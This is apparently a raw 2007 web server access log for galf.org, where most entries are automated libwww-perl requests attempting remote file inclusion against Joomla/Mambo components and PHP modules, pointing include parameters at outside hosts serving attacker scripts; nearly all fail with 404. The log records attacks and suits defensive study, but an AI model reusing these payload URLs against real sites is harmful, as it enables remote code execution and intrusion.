64.38.50.26 - - [18/Nov/2007:20:22:58 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [18/Nov/2007:20:22:59 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.50.26 - - [18/Nov/2007:20:22:59 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.115.183.162 - - [18/Nov/2007:20:23:23 -0800] "GET /logs/access_070917.log//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.115.183.162 - - [18/Nov/2007:20:23:24 -0800] "GET //ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.115.183.162 - - [18/Nov/2007:20:23:24 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64"
209.115.183.162 - - [18/Nov/2007:20:23:29 -0800] "GET /logs/access_070625.log//ws/login.php?noSet=0&includedir=http://uniquantum.co.kr/.../safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
200.43.222.198 - - [18/Nov/2007:20:24:27 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:20:25:17 -0800] "GET /logs/access_071015.log//index.php?include=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
145.253.239.90 - - [18/Nov/2007:20:25:18 -0800] "GET /logs//index.php?include=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.218.34 - - [18/Nov/2007:20:25:52 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:25:52 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:25:52 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:26:00 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:26:04 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.wsteam.net/include.c?%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:27:22 -0800] "GET /logs/access_071028.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:27:22 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
67.18.218.34 - - [18/Nov/2007:20:27:22 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.80.193.33 - - [18/Nov/2007:20:28:05 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312466)" "galf.org"
145.253.239.90 - - [18/Nov/2007:20:28:57 -0800] "GET /logs/access_070723.log//index.php?include=http://www.lolz.kit.net/safe/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:20:29:06 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:20:29:06 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:29:35 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.218.34 - - [18/Nov/2007:20:30:08 -0800] "GET /logs/access_071008.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
68.180.250.113 - - [18/Nov/2007:20:30:37 -0800] "GET /logs/access_071029.log HTTP/1.0" 200 524288